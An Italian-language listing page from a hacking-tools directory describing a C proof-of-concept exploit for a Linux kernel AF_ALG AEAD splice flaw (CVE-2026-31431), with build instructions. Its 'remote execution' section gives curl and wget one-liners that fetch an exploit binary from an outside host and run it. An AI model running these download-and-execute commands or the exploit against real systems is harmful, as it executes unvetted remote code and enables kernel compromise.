Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431 — Porting in C di un proof-of-concept che sfrutta un difetto nella logica splice AEAD AF_ALG del kernel Linux (CVE-2026-31431) per ricerca educativa. | Kitploit
Strumenti/GitHubGitHub/offsecguy/cve-2026-31431
Analisi delle VulnerabilitàExploitBinary Exploitation
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

Porting in C di un proof-of-concept che sfrutta un difetto nella logica splice AEAD AF_ALG del kernel Linux (CVE-2026-31431) per ricerca educativa.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

copy.fail — Primitiva splice AEAD AF_ALG (CVE-2026-31431)

Panoramica

Questo progetto è una porting in C del prototipo originale in Python, di offsecguy.
Sfrutta l'API crypto del kernel Linux (AF_ALG) utilizzando:

  • Modalità AEAD authencesn(hmac(sha256),cbc(aes))
  • Flag MSG_MORE
  • Chiamata di sistema splice()

La tecnica alimenta i dati da un descrittore di file di sola lettura attraverso un socket crypto, elaborandoli blocco per blocco.


⚙️ Compilazione

Opzione 1 — musl (Build statico)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Opzione 2 — GCC statico

root@kitploit:~
gcc exp.c -o exp -lz -s -static

Opzione 3 — GCC dinamico

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 Esecuzione remota

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Note

  • Richiede il supporto del kernel Linux per AF_ALG
  • Utilizza zlib per la decompressione
  • Progettato per l'interazione e la sperimentazione con la crypto a basso livello del kernel

Disclaimer

Questo codice è fornito solo a scopo educativo e di ricerca.
Usalo in modo responsabile e solo su sistemi che sei autorizzato a testare.

Scarica lo strumento